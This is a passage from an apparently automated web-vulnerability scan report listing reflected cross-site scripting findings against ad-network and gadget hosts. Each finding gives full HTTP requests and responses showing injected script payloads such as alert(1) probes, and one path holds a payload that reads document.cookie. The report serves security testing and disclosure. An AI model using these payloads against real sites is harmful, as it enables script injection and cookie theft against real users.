User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:29 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106969_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:29 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:29 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 848

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...
4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead&1781d"-alert(1)-"f40f9a0d3a9=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

6.126. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 371ae"-alert(1)-"00f549dcd was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead371ae"-alert(1)-"00f549dcd HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:15 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106955_1314893682667:57564808264332436; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:15 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:15 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 843

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...
H4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead371ae"-alert(1)-"00f549dcd' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

6.127. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c391a%3balert(1)//4913b697698 was submitted in the url parameter. This input was echoed as c391a;alert(1)//4913b697698 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=c391a%3balert(1)//4913b697698&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142%26title%3D48%2Bhours%2Bon%252C%2BMumbai%2Bairport%2527s%2Bmain%2Brunway%2Bstill%2Bshut%26ctype%3Dstory%26identifier%3Dstory-131142 HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 502 Bad Gateway
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:45:26 GMT
Expires: Sun, 04 Sep 2011 02:45:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 71
Server: GSE

Unable to retrieve spec for c391a;alert(1)//4913b697698. HTTP error 502

6.128. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 75ccb%0aalert(1)//22ed514ee17 was submitted in the url parameter. This input was echoed as 75ccb
alert(1)//22ed514ee17
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/osapi-0.8.xml75ccb%0aalert(1)//22ed514ee17&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142%26title%3D48%2Bhours%2Bon%252C%2BMumbai%2Bairport%2527s%2Bmain%2Brunway%2Bstill%2Bshut%26ctype%3Dstory%26identifier%3Dstory-131142 HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:45:29 GMT
Expires: Sun, 04 Sep 2011 02:45:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 128
Server: GSE

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/osapi-0.8.xml75ccb
alert(1)//22ed514ee17
. HTTP error 400

6.129. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c0834<script>alert(1)</script>5753f1ee238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /actionc0834<script>alert(1)</script>5753f1ee238/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:16:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 04:16:01 GMT
Vary: Accept-Encoding
Content-Length: 706
Connection: close
Content-Type: text/html

<pre>exception 'CHttpException' with message 'Unable to resolve the request "actionc0834<script>alert(1)</script>5753f1ee238/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/T
...[SNIP]...

6.130. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0835<img%20src%3da%20onerror%3dalert(1)>de3898c9eca was submitted in the REST URL parameter 2. This input was echoed as b0835<img src=a onerror=alert(1)>de3898c9eca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /action/trackb0835<img%20src%3da%20onerror%3dalert(1)>de3898c9eca/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:16:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 04:16:02 GMT
Vary: Accept-Encoding
Content-Length: 682
Connection: close
Content-Type: text/html

<pre>exception 'CHttpException' with message 'The system is unable to find the requested action "trackb0835<img src=a onerror=alert(1)>de3898c9eca".' in /home/library/framework/web/CController.php:477
Stack trace:
#0 /home/library/framework/web/CController.php(262): CController->
...[SNIP]...

6.131. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4161<script>alert(1)</script>49045a73842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /actiond4161<script>alert(1)</script>49045a73842/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:16:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 04:16:01 GMT
Vary: Accept-Encoding
Content-Length: 761
Connection: close
Content-Type: text/html

<pre>exception 'CHttpException' with message 'Unable to resolve the request "actiond4161<script>alert(1)</script>49045a73842/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">
...[SNIP]...

6.132. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73908<img%20src%3da%20onerror%3dalert(1)>f87fbc45e77 was submitted in the REST URL parameter 2. This input was echoed as 73908<img src=a onerror=alert(1)>f87fbc45e77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /action/track73908<img%20src%3da%20onerror%3dalert(1)>f87fbc45e77/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:16:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 04:16:02 GMT
Vary: Accept-Encoding
Content-Length: 682
Connection: close
Content-Type: text/html

<pre>exception 'CHttpException' with message 'The system is unable to find the requested action "track73908<img src=a onerror=alert(1)>f87fbc45e77".' in /home/library/framework/web/CController.php:477
Stack trace:
#0 /home/library/framework/web/CController.php(262): CController->
...[SNIP]...

6.133. http://msite.martiniadnetwork.com/index/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3c32<script>alert(1)</script>92183ca25d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /indexa3c32<script>alert(1)</script>92183ca25d0/?pid=1000000986802&sid=1000005169510&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&rnd=733840892&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dmumbay%2Bnews%26pbx%3D1%26oq%3Dmumbay%2Bnews%26aq%3Df%26aqi%3Dg-c5%26aql%3D%26gs_sm%3De%26gs_upl%3D32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0%26bav%3Don.2%2Cor.r_gc.r_pw. HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:41:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:41:25 GMT
Vary: Accept-Encoding
Content-Length: 465
Content-Type: text/html

<pre>exception 'CHttpException' with message 'Unable to resolve the request "indexa3c32<script>alert(1)</script>92183ca25d0".' in /home/library/framework/web/CWebApplication.php:281
Stack trace:
#0 /home/library/framework/web/CWebApplication.php(136): CWebApplication->
...[SNIP]...

6.134. http://msite.martiniadnetwork.com/index/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f698'%3balert(1)//e00053b0c8a was submitted in the pid parameter. This input was echoed as 4f698';alert(1)//e00053b0c8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/?pid=10000009868024f698'%3balert(1)//e00053b0c8a&sid=1000005169510&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&rnd=733840892&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dmumbay%2Bnews%26pbx%3D1%26oq%3Dmumbay%2Bnews%26aq%3Df%26aqi%3Dg-c5%26aql%3D%26gs_sm%3De%26gs_upl%3D32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0%26bav%3Don.2%2Cor.r_gc.r_pw. HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=n4TdBlRhNZdsrexENFpuoLQ2lY291DhPmCSkzHjtIJhIrlKBMcY4SLfbQLI%2B1gsyRBTho8GvtoJ9h5Hwz9Z6xvZsyeQqgfaDMiPYESAYM3VZnxngJflPyn6ZBQF0P2QKN7DpGr1qCZr0OLQFtPLugmQXwzZMvzajjpFbYg%3D%3D; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=ujBzvI%2Fu3oiZfVMCEKQUy3C4XM8EJTl1Z2Q9F8sYcv188dxFIQ06j54f6sauInBPIEys313s8SDaa987qAXlyQaYlrgvdQmxq2cIzxjuVkrjmKeodTxAgPvtU9%2F%2BppLudzcYW2co8GI66npQrwgwF%2FAddmqpwhjW2c74a1dmtsN1monDJqFmR%2BmMvidhUFtzRBYOG2qWaKwKWHzVoSUWF0PP6UN%2BYKARjRNwA8xuM1IdJgfxwphdRdyESI25aMIUPFY5kAFSbFHhuCsKAHh9V1J37qs13vTF5ObI%2BR1%2FFmO3SkYnYwQBpS2haOk9lnKjZaMHmHQ9jcC713hYmeiatinXKSAPK2h9utKSacvDyFpKeJycIJt2rvferiRxmCEMpxRVjUcny3rv; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=22; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:35:27 GMT
Vary: Accept-Encoding
Content-Length: 1347
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/10000009868024f698';alert(1)//e00053b0c8a/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F';
OAS_pubclick = OAS_pubclick + '/pubclick/' + MMI_ClickURL;
var OAS_
...[SNIP]...

6.135. http://msite.martiniadnetwork.com/index/ [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bd74'%3balert(1)//fb3f90f9c4c was submitted in the sid parameter. This input was echoed as 9bd74';alert(1)//fb3f90f9c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/?pid=1000000986802&sid=10000051695109bd74'%3balert(1)//fb3f90f9c4c&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&rnd=733840892&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dmumbay%2Bnews%26pbx%3D1%26oq%3Dmumbay%2Bnews%26aq%3Df%26aqi%3Dg-c5%26aql%3D%26gs_sm%3De%26gs_upl%3D32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0%26bav%3Don.2%2Cor.r_gc.r_pw. HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:37:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=4oFB%2BXGtOGAkXp4WPWC8TdCDVQ6m6FRuP%2FMase%2BzCOisFEhevd%2Brrw%2FQ9fOrLyKwGSuxfHLzZM0mRqaEmaJblkrKyNpmenaFqT145wvU%2Fj22lmlpedZw6FlID%2BOBW%2FHTkIQMrQo%2B3b2NZo4y5AyAB8Q5qblQgerGcBTmyg%3D%3D; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
